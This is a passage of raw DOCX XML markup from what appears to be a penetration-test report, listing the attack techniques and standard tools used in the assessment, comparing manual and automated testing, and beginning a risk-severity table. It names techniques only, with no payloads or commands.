            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Custom Scripting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73422305" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Custom Python and Bash scripts were utilized for automating specific attack vectors and enumerating targets based on unique application structures.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="678D80F1" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5"/>
    <w:p w14:paraId="3A987FB5" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="attack-techniques"/>
      <w:bookmarkStart w:id="79" w:name="_Toc178498982"/>
      <w:bookmarkEnd w:id="76"/>
      <w:r w:rsidRPr="00037BB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Attack Techniques</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="07681AA6" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>During the exploitation phase, we employed several attack techniques to compromise the application’s security. Below is a summary of the techniques used during this assessment:</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751"/>
        <w:gridCol w:w="7599"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D0BA5" w14:paraId="2D14654C" w14:textId="77777777" w:rsidTr="00211D1D">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shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="3FD30841" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attack Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1DF07710" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="7715CF13" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="027EEF34" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AAB4228" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL injection was performed to manipulate SQL queries executed by the application. Tools like </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SQLmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> were used for automated exploitation, while manual payloads were used for bypassing WAF protections.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="3B97A2D7" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="1AB5F4E1" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Cross-Site Scripting (XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="518021A5" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Multiple types of XSS (Reflected, Stored, DOM-based) were identified, which could allow an attacker to steal session tokens, inject malicious scripts, or perform unauthorized actions on behalf of other users.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="38EED060" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="434EDB29" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="433A918E" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Command injection vulnerabilities were identified, allowing execution of arbitrary commands on the host system. Tools like </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Commix</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and manual payloads were used to exploit this vulnerability.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="19B39101" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="3CBCB9E8" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Session Hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F34DA9D" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Session tokens were intercepted via MITM attacks using </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Wireshark</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Burp Suite</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and replayed to hijack user sessions and gain unauthorized access to privileged accounts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="5D9A44E8" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="18CE9048" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Network Attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4781E77B" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Techniques such as Man-in-the-Middle (MITM), DNS hijacking, and ARP spoofing were used to test the resilience of the application against network-level threats</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="5F0B9C43" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D" w:themeFill="text2" w:themeFillShade="BF"/>
          </w:tcPr>
          <w:p w14:paraId="02524F5A" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Password Attacks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ABAE5B8" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Password spraying and brute-force techniques were executed using </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hydra</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and custom wordlists. Weak passwords were cracked using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Hashcat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>John the Ripper</w:t>
            </w:r>
            <w:r w:rsidRPr="00037BB4">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B768DB4" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:r>
        <w:pict w14:anchorId="288F5027">
          <v:rect id="_x0000_i1076" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E272AA6" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="manual-vs.-automated-testing"/>
      <w:bookmarkStart w:id="81" w:name="_Toc178498983"/>
      <w:bookmarkEnd w:id="78"/>
      <w:r w:rsidRPr="00037BB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Manual vs. Automated Testing</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w14:paraId="6F9C1099" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Both manual and automated techniques were utilized to ensure thorough coverage across the application. Here’s a breakdown of the two approaches:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5135A5CE" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Manual Testing</w:t>
      </w:r>
      <w:r>
        <w:t>: This included custom-crafted payloads for injection attacks, business logic flaws, and complex vulnerabilities that automated tools may overlook. Manual efforts also involved testing for authorization bypass and improper session management that may lead to vertical and horizontal privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1226C327" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automated Testing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Automated tools like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Nessus</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>Burp Suite Pro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t>OWASP ZAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> were used to quickly scan for commonly known vulnerabilities such as open ports, outdated software, weak SSL/TLS configurations, and misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7419778C" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>By combining these two approaches, we were able to achieve both breadth and depth in the vulnerability assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100C2189" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:r>
        <w:pict w14:anchorId="1D02A743">
          <v:rect id="_x0000_i1077" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6F38FF" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00037BB4" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="risk-assessment-prioritization"/>
      <w:bookmarkStart w:id="83" w:name="_Toc178498984"/>
      <w:bookmarkEnd w:id="80"/>
      <w:r w:rsidRPr="00037BB4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Risk Assessment &amp; Prioritization</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="11EA5945" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="003D0BA5">
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Each identified vulnerability was evaluated and assigned a risk score based on its potential impact, exploitability, and severity. Below is the risk categorization model used:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1123"/>
        <w:gridCol w:w="8237"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D0BA5" w14:paraId="086AFCD3" w14:textId="77777777" w:rsidTr="00211D1D">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single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="666F5C3E" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5932AEDB" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="4687FCCE" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="0B71E866" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2BED37F2" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Vulnerabilities that could lead to complete system compromise or data breach. Immediate action is required to prevent serious exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="2F0EA3BD" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="69FA4605" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="415D3031" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t>Vulnerabilities that present significant risk, such as unauthorized access or data modification, which could lead to a major security incident if exploited.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="7643497A" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="5FAC5EA1" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="72B71F93" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
